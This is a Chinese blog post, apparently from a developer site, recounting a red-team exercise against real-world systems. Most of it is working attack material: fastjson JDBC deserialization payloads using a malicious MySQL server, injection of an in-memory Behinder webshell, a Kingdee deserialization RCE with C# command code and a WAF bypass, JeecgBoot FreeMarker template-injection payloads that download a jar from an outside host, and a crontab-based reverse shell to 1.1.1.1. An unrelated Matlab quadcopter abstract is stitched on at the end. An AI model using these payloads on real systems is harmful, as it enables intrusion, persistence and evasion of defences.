记录一次某地级网络攻防总结,黑客技术漏洞挖掘零基础入门到精通教程!

前言:

最近刚结束一场攻防,也都是靠nday打下了不少点,今天就简单写一下外网的几个案例。

被动扫描工具:

这里先推荐一下自己常用的几个burp插件:

HAE:能够通过正则匹配到数据包中敏感的信息,例如账号密码,ak,sk等

passive scan client:被动扫描流量转发插件

log4j2,fastjson,shiro这几个必备的扫描插件,能够被动扫描这几种漏洞

RouteVulScan:比较好用的一款递归脆弱路径扫描插件,实战中扫一些敏感路劲以及未授权很好使

这里先启动xray被动监听:

passive scan client插件配置好扫描得端口

xray.exe webscan --listen 127.0.0.1:1664 --ho vuln.html

在这里插入图片描述

浏览器配置burp得代理端口,这样用浏览器访问网站,流量就会同时经过xray和burp,逐个功能点点击就能等着收洞了

这里还可以利用浏览器拓展程序Opens a list of URLs,该拓展程序可同时打开多个网站

在这里插入图片描述

这样可以提高扫描速率

漏洞案例:

fastjson中JDBC反序列化:

通过burp插件扫到某个站存在fatjson反序列化,payload为:

{"x":{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToCo  
nnectTo":"dnslog","portToConnectTo":80,"info":{"user":"root","password":"ubuntu","useSSL":"false","statementInterceptors":"com.mysql.jdbc.  
interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"},"databaseToConnectTo":"mys  
ql","url":""}}

如果不太会打的话,可以参考我之前写的文章,

vps启动一个恶意得mysql服务:

./evil-mysql-server -addr 3307 -java java -ysuserial ysuserial-1.5-su18-all.jar

fuzz利用链:

将hostToConnectTo地址替换成vps地址:vps:3307

将user替换成fuzz利用链得payload:ysu_URLDNS_all:i.dnslog.cn

{"x":{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToCo  
nnectTo":"vps:3307","portToConnectTo":80,"info":{"user":"ysu_URLDNS_all:ibxz5y.dnslog.cn","password":"ubuntu","useSSL":"false","statementInterceptors":"com.mysql.jdbc.  
interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"},"databaseToConnectTo":"mys  
ql","url":""}}

在这里插入图片描述

可以看到dnslog有回显,根据ysu得github可知:有如下链子可以打

在这里插入图片描述

构造poc执行命令:这里利用EX-TomcatEcho执行命令

在请求头添加X-Token-Data:ifconfig即可执行命令:

{"x":{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToCo  
nnectTo":"vps:3307","portToConnectTo":80,"info":{"user":"ysu_CommonsBeanutils2_  
EX-TomcatEcho","password":"ubuntu","useSSL":"false","statementInterceptors":"com.mysql.jdbc.  
interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"},"databaseToConnectTo":"mys  
ql","url":""}}

在这里插入图片描述

注入冰蝎内存马:

使用EX-MS-TSMSFromThread-bx注入冰蝎内存马:

{"x":{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToCo  
nnectTo":"vps:3307","portToConnectTo":80,"info":{"user":"ysu_CommonsBeanutils2_  
EX-MS-TSMSFromThread-bx","password":"ubuntu","useSSL":"false","statementInterceptors":"com.mysql.jdbc.  
interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"},"databaseToConnectTo":"mys  
ql","url":""}}

冰蝎连接:

在这里插入图片描述

在这里插入图片描述

金蝶反序列化rce waf绕过:

某站金蝶 /k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc接口存在反序列化,执行命令时被拦截

经测试可知,拦截了请求头得命令执行以及传入的反序列化数据

在这里插入图片描述

绕过方法:

工具:https://github.com/pwntester/ysoserial.net

比如我想执行ipconfig:

class E  
{  
    public E()  
    {  
        System.Web.HttpContext context = System.Web.HttpContext.Current;  
        context.Server.ClearError();  
        context.Response.Clear();  
        try  
        {  
            System.Diagnostics.Process process = new System.Diagnostics.Process();  
            process.StartInfo.FileName = "cmd.exe";  
            string cmd = context.Request.Headers["cmd"];  
            process.StartInfo.Arguments = "/c ipconfig";  
            process.StartInfo.RedirectStandardOutput = true;  
            process.StartInfo.RedirectStandardError = true;  
            process.StartInfo.UseShellExecute = false;  
            process.Start();  
            string output = process.StandardOutput.ReadToEnd();  
            context.Response.Write(output);  
        } catch (System.Exception) {}  
        context.Response.Flush();  
        context.Response.End();  
    }  
}

在这里插入图片描述

生成payload

ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c "cmd.cs;System.Windows.Forms.dll;System.Web.dll;System.dll"

对生成得数据做处理:

对AAEAAAD/////AQAAAAAAAAA之间逐个加空格即可绕过

在这里插入图片描述

jeecgboot 模板注入:

积木报表模板注入漏洞实战中是非常常见的,

积木报表jmreport/queryFieldBySql接口存在SSTI模板注入漏洞,该漏洞可获取系统权限

打开网站长这个样子,该网站大概率是采用该框架的

在这里插入图片描述

通过本次演练,总结了两个打这种网站的方法:

第一种就是直接写入内存马:

这里就简单讲一下出网打内存马把:

利用java内存马工具生成一个tomcat filter型的jar包:

在这里插入图片描述

使用第一个exp将jar包下载到服务器:

<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"wget http://1.1.1.1:8000/final.jar\")}

在使用第二个exp加载该jar包即可:

${\"freemarker.template.utility.ObjectConstructor\"?new()(\"org.springframework.expression.spel.standard.SpelExpressionParser\").parseExpression(\"new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL('file://final.jar')}, T(java.lang.Thread).currentThread().getContextClassLoader()).loadClass('org.apache.http.client.yf.NetworkUtils').newInstance()\").getValue()}

这里将loadClass替换成注入器类名即可,这里我的注入器类名为org.apache.http.client.yf.NetworkUtils

在这里插入图片描述

也有遇到过内存马打不了的情况,这时可以采用定时任务反弹shell的方法

因为你如果直接反弹shell,会不稳定,执行命令容易掉线:

echo "bash -i >& /dev/tcp/1.1.1.1/1111 0>&1" > /tmp/1.sh  
  
(crontab -l;printf "*/5 * * * * /bin/bash /tmp/1.sh;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

注意这里的两条命令要用base64编码去执行:

类似这种

在这里插入图片描述

利用该命令发过去即可得到一个稳定shell

<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"base64编码命令\")}

在这里插入图片描述

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

在这里插入图片描述
在这里插入图片描述

【四轴飞行器】非线性三自由度四轴飞行器模拟器研究(Matlab代码实现)内容概要:本文围绕非线性三自由度四轴飞行器的建模与仿真展开,重点介绍了基于Matlab的飞行器动力学模型构建与控制系统设计方法。通过对四轴飞行器非线性运动方程的推导,建立其在三维空间中的姿态与位置动态模型,并采用数值仿真手段实现飞行器在复杂环境下的行为模拟。文中详细阐述了系统状态方程的构建、控制输入设计以及仿真参数设置,并结合具体代码实现展示了如何对飞行器进行稳定控制与轨迹跟踪。此外,文章还提到了多种优化与控制策略的应用背景,如模型预测控制、PID控制等,突出了Matlab工具在无人机系统仿真中的强大功能。; 适合人群:具备一定自动控制理论基础和Matlab编程能力的高校学生、科研人员及从事无人机系统开发的工程师;尤其适合从事飞行器建模、控制算法研究及相关领域研究的专业人士。; 使用场景及目标:①用于四轴飞行器非线性动力学建模的教学与科研实践;②为无人机控制系统设计(如姿态控制、轨迹跟踪)提供仿真验证平台;③支持高控制算法(如MPC、LQR、PID)的研究与对比分析; 阅读建议:建议读者结合文中提到的Matlab代码与仿真模型,动手实践飞行器建模与控制流程,重点关注动力学方程的实现与控制器参数调优,同时可拓展至多自由度或复杂环境下的飞行仿真研究。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值